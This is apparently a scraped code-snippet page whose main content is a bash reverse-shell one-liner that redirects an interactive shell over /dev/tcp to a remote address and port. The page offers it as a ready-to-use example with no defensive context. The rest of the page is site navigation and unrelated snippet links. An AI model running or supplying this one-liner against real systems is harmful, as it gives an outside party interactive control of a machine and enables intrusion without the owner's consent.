Menu
NEWBEDEV
Python
Javascript
Linux
Cheat sheet
NEWBEDEV
Python 1
Javascript
Linux
Cheat sheet
Contact
reverse shell sh code example
Example: reverse shell bash
bash
-i
>&
/dev/tcp/10.0.0.1/8080
0
>
&1
Tags:
Shell Example
Related
install git using homebrew code example
Setting up round 1, round 2 in unity code example
delete builpacks on heroku code example
console.log .trim code example
letter in reverse order string python code example
google fonts css header code example
pass a callback to useState code example
remove column from sql database code example
java method you can call on object code example
js separate strings from comma in object value code example
bootstrap template using component code example
how to convert number with a thousand seperator to string in php code example
Recent Posts
Pandas how to find column contains a certain value
Recommended way to install multiple Python versions on Ubuntu 20.04
Build super fast web scraper with Python x100 than BeautifulSoup
How to convert a SQL query result to a Pandas DataFrame in Python
How to write a Pandas DataFrame to a .csv file in Python